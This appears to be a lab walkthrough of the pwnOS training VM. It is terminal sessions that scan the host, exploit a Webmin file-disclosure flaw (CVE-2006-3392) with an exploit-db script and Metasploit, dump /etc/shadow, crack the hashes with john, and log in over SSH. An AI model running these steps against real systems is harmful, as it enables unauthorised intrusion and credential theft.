┌──(kali㉿kali)-[~]
└─$ netdiscover --help
-i device: your network device
-r range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8
-P print results in a format suitable for parsing by another program and stop ...┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -P -i eth1 -r 192.168.88.0/24
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.88.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.88.133 00:0c:29:5e:18:c9 1 60 VMware, Inc.
192.168.88.254 00:50:56:e9:ef:7d 1 60 VMware, Inc.
-- Active scan completed, 3 Hosts found.┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ sudo nmap -Pn -p- -v $pwnOS
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-19 17:07 CEST
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.52 seconds22, 80, 139, 445, 10000┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ sudo nmap -sS -sU -p 22,80,139,445,10000,44000 -T4 -A -sV $pwnOS
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_ 2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: Site does not have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open ` Z�6V Samba smbd 3.0.26a (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-server-header: MiniServ/0.01
|_http-title: Site doesn not have a title (text/html; Charset=iso-8859-1).
44000/tcp closed unknown
PORT STATE SERVICE VERSION
22/udp closed ssh
PORT STATE SERVICE VERSION
80/udp closed http
PORT STATE SERVICE VERSION
139/udp closed netbios-ssn
PORT STATE SERVICE VERSION
445/udp closed microsoft-ds
PORT STATE SERVICE VERSION
10000/udp open webmin (http on TCP port 10000 ())
PORT STATE SERVICE VERSION
44000/udp closed unknown
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM), Linux 2.6.22 - 2.6.23
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| NetBIOS computer name:
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
|_ System time: 2023-10-18T13:22:07-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -18h22m46s, deviation: 3h32m08s, median: -20h52m47s
|_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Nmap done: 1 IP address (1 host up) scanned in 50.95 seconds┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ sudo nmap -Pn -p 80,10000 --script=vuln $pwnOS
PORT STATE SERVICE
80/tcp open http
|_http-trace: TRACE is enabled
|_http-csrf: Couldn not find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn not find any DOM based XSS.
|_http-stored-xss: Couldn not find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
| /index/: Potentially interesting folder
|_ /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
PORT STATE SERVICE
10000/tcp open snet-sensor-mgmt
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_ http://www.exploit-db.com/exploits/1997/
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 328.52 seconds
Exploit references from nmap scan: http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392 http://www.exploit-db.com/exploits/1997/
Exploit via php script
wget https://www.exploit-db.com/download/1997
sudo apt install php-curl┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ php 1997 $pwnOS 10000 HTTP /etc/passwd
Attacking 192.168.88.133
---------------------------------
root:x:0:0:root:/root:/bin/bash
'...'
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
---------------------------------
Coded by joffer , http://securitydot.net
# milw0rm.com [2006-07-09] ┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ php 1997 $pwnOS 10000 HTTP /etc/shadow
Attacking 192.168.88.133
---------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
'...'
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
---------------------------------
Coded by joffer , http://securitydot.net
# milw0rm.com [2006-07-09] Exploit via Metasploit
┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ msfconsole
msf6 > use auxiliary/admin/webmin/file_disclosure
msf6 > show options
Module options (auxiliary/admin/webmin/file_disclosure):
Name Current Setting Required Description
---- --------------- -------- -----------
DIR /unauthenticated yes Webmin directory path
Proxies no A proxy chain of format '...'
RHOSTS yes The target host(s), '...'
RPATH /etc/passwd yes The file to download
RPORT 10000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Download Download arbitrary file
msf6 > set rhosts 192.168.88.133
msf6 > set rpath /etc/shadow
msf6 > download
[*] Running module against 192.168.88.133
[*] Attempting to retrieve /etc/shadow...
[*] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
'...'
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completedroot:x:0:0:root:/root:/bin/bash
'...'
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bashroot:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
'...'
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ unshadow passwd_pwnOs shadow__pwnOs > unshadow_pwnOs root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:0:0:root:/root:/bin/bash
'...'
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:1000:1000:vmware,,,:/home/vmware '...'
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:1001:1001::/home/obama:/bin/bash
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:1002:1002::/home/osama:/bin/bash
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:1003:1003::/home/yomama:/bin/bash┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt unshadow_pwnOs┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt unshadow_pwnOs
Warning: detected hash type "md5crypt", but the string is also recognized '...'
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) '...'
h4ckm3 (vmware)
1g 0:00:14:35 DONE (2023-10-19 20:21) '...'
Session completed. ┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ ssh vmware@192.168.88.133
Unable to negotiate with 192.168.88.133 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dssLinux: ssh client throwing unable to negotiate error
| Password | User |
|---|---|
| h4ckm3 | vmware |
┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ ssh -oHostKeyAlgorithms=+ssh-rsa vmware@192.168.88.133
vmware@192.168.88.133´s password:
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Jun 20 14:35:37 2008
vmware@ubuntuvm:~$ whoami
vmware
vmware@ubuntuvm:~$- #todo Privilege Escalation